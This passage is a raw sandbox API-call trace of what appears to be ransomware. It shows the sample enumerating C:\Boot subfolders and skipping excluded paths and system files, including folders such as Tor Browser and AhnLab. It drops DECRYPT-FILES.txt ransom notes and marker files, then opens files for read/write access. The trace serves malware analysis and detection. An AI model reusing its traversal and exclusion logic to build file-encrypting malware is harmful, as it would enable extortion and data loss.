lpString2="autorun.inf") returned 1 [0071.351] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.351] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.351] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.351] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.351] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.351] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.352] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.352] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.352] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.352] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.352] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.352] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.352] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.352] lstrlenW (lpString="C:\\Boot\\zh-CN\\") returned 14 [0071.352] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.352] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\zh-CN\\" | out: lpString1="C:\\Boot\\zh-CN\\") returned="C:\\Boot\\zh-CN\\" [0071.352] lstrcatW (in: lpString1="C:\\Boot\\zh-CN\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned="C:\\Boot\\zh-CN\\bootmgr.exe.mui" [0071.352] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.352] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.353] CloseHandle (hObject=0x0) returned 0 [0071.353] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.353] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bf5e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.353] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.353] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bf5e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.353] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.353] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.353] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.353] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.353] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.353] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.353] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.353] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.353] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.353] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.353] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.353] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.354] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.354] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.354] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.354] lstrlenW (lpString="C:\\Boot\\zh-CN\\") returned 14 [0071.354] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.354] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\zh-CN\\" | out: lpString1="C:\\Boot\\zh-CN\\") returned="C:\\Boot\\zh-CN\\" [0071.354] lstrcatW (in: lpString1="C:\\Boot\\zh-CN\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\zh-CN\\jkbimi8.tmp") returned="C:\\Boot\\zh-CN\\jkbimi8.tmp" [0071.354] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.354] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\jkbimi8.tmp" (normalized: "c:\\boot\\zh-cn\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.354] CloseHandle (hObject=0x0) returned 0 [0071.354] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.354] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bf5e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.354] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.354] CloseHandle (hObject=0x420) returned 1 [0071.355] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0071.355] lstrcmpW (lpString1="zh-HK", lpString2=".") returned 1 [0071.355] lstrcmpW (lpString1="zh-HK", lpString2="..") returned 1 [0071.355] lstrcatW (in: lpString1="zh-HK", lpString2="\\" | out: lpString1="zh-HK\\") returned="zh-HK\\" [0071.355] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="zh-HK\\" | out: lpString1="C:\\Boot\\zh-HK\\") returned="C:\\Boot\\zh-HK\\" [0071.355] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\Program Files") returned 0x0 [0071.355] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch=":\\Windows") returned 0x0 [0071.355] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\Games\\") returned 0x0 [0071.355] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.355] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.355] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.355] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.355] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.355] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\All Users") returned 0x0 [0071.355] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.355] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.355] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.355] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="AhnLab") returned 0x0 [0071.355] StrStrW (lpFirst="C:\\Boot\\zh-HK\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.355] lstrlenW (lpString="C:\\Boot\\zh-HK\\") returned 14 [0071.355] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.355] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\zh-HK\\\\jkbimi8.tmp") returned 26 [0071.355] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\\\jkbimi8.tmp" (normalized: "c:\\boot\\zh-hk\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.356] lstrlenW (lpString="C:\\Boot\\zh-HK\\") returned 14 [0071.356] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.356] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\zh-HK\\\\DECRYPT-FILES.txt") returned 32 [0071.356] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\zh-hk\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.356] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.357] CloseHandle (hObject=0x424) returned 1 [0071.357] lstrlenW (lpString="C:\\Boot\\zh-HK\\") returned 14 [0071.357] lstrcatW (in: lpString1="C:\\Boot\\zh-HK\\", lpString2="*" | out: lpString1="C:\\Boot\\zh-HK\\*") returned="C:\\Boot\\zh-HK\\*" [0071.357] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.357] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.357] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.358] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.358] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.358] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.358] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.358] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.358] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.358] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.358] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.358] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.358] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.358] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.358] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.358] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.358] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.358] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.358] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.358] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.358] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.358] lstrlenW (lpString="C:\\Boot\\zh-HK\\") returned 14 [0071.358] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.358] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\zh-HK\\" | out: lpString1="C:\\Boot\\zh-HK\\") returned="C:\\Boot\\zh-HK\\" [0071.358] lstrcatW (in: lpString1="C:\\Boot\\zh-HK\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned="C:\\Boot\\zh-HK\\bootmgr.exe.mui" [0071.358] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.358] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.358] CloseHandle (hObject=0x0) returned 0 [0071.359] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.359] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c1bfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.359] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.359] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c1bfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.359] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.359] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.359] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.359] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.359] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.359] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.359] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.359] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.359] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.359] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.359] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.359] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.359] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.359] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.359] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.359] lstrlenW (lpString="C:\\Boot\\zh-HK\\") returned 14 [0071.359] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.359] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\zh-HK\\" | out: lpString1="C:\\Boot\\zh-HK\\") returned="C:\\Boot\\zh-HK\\" [0071.359] lstrcatW (in: lpString1="C:\\Boot\\zh-HK\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\zh-HK\\jkbimi8.tmp") returned="C:\\Boot\\zh-HK\\jkbimi8.tmp" [0071.359] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.360] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\jkbimi8.tmp" (normalized: "c:\\boot\\zh-hk\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.360] CloseHandle (hObject=0x0) returned 0 [0071.360] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.360] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c1bfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.360] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.360] CloseHandle (hObject=0x420) returned 1 [0071.360] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0071.360] lstrcmpW (lpString1="zh-TW", lpString2=".") returned 1 [0071.360] lstrcmpW (lpString1="zh-TW", lpString2="..") returned 1 [0071.360] lstrcatW (in: lpString1="zh-TW", lpString2="\\" | out: lpString1="zh-TW\\") returned="zh-TW\\" [0071.360] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="zh-TW\\" | out: lpString1="C:\\Boot\\zh-TW\\") returned="C:\\Boot\\zh-TW\\" [0071.360] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\Program Files") returned 0x0 [0071.360] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch=":\\Windows") returned 0x0 [0071.360] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\Games\\") returned 0x0 [0071.360] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.361] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.361] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.361] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.361] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.361] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\All Users") returned 0x0 [0071.361] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.361] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.361] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.361] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="AhnLab") returned 0x0 [0071.361] StrStrW (lpFirst="C:\\Boot\\zh-TW\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.361] lstrlenW (lpString="C:\\Boot\\zh-TW\\") returned 14 [0071.361] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.361] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\zh-TW\\\\jkbimi8.tmp") returned 26 [0071.361] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\\\jkbimi8.tmp" (normalized: "c:\\boot\\zh-tw\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.361] lstrlenW (lpString="C:\\Boot\\zh-TW\\") returned 14 [0071.361] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.361] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\zh-TW\\\\DECRYPT-FILES.txt") returned 32 [0071.361] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\zh-tw\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.362] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.363] CloseHandle (hObject=0x424) returned 1 [0071.363] lstrlenW (lpString="C:\\Boot\\zh-TW\\") returned 14 [0071.363] lstrcatW (in: lpString1="C:\\Boot\\zh-TW\\", lpString2="*" | out: lpString1="C:\\Boot\\zh-TW\\*") returned="C:\\Boot\\zh-TW\\*" [0071.363] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.363] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.363] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.363] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.363] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.363] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.363] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.363] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.363] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.364] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.364] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.364] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.364] lstrlenW (lpString="C:\\Boot\\zh-TW\\") returned 14 [0071.364] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.364] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\zh-TW\\" | out: 